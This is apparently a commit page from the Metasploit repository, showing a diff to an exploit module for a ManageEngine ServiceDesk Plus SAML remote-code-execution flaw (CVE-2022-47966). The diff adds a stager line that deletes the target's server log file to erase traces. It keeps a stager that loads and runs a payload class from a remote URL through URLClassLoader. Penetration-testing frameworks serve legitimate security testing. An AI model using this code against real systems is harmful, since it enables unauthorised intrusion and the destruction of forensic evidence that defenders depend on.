Delete log entries on target

rapid7 · Nov 5, 2023 · b9c65d5 · b9c65d5
1 parent ba196b4
commit b9c65d5
Showing 1 changed file with 10 additions and 3 deletions.
diff --git a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -166,13 +166,20 @@ def trigger_urlclassloader
     # Here we construct a XSLT transform to load a Java payload via URLClassLoader.
     url = get_uri
 
-    var = Rex::Text.rand_text_alpha_lower(5..8)
+    vars = Set.new
+    loop do
+      vars << Rex::Text.rand_text_alpha_lower(5..8)
+      break unless vars.size < 2
+    end
+    vars = vars.to_a
 
     # stager for javascript engine
     java_stager = <<~EOS
-      var #{var} = Java.type(&quot;java.lang.String[]&quot;);
+      var #{vars[0]} = Java.type(&quot;java.io.File&quot;);
+      new #{vars[0]}(&quot;../logs/serverout0.txt&quot;).delete();
+      var #{vars[1]} = Java.type(&quot;java.lang.String[]&quot;);
       var c = new java.net.URLClassLoader([new java.net.URL(&quot;#{url}&quot;)]).loadClass(&quot;metasploit.Payload&quot;);
-      c.getMethod(&quot;main&quot;, java.lang.Class.forName(&quot;[Ljava.lang.String;&quot;)).invoke(null, [new #{var}(1)]);
+      c.getMethod(&quot;main&quot;, java.lang.Class.forName(&quot;[Ljava.lang.String;&quot;)).invoke(null, [new #{vars[1]}(1)]);
     EOS
 
     transform = <<~EOT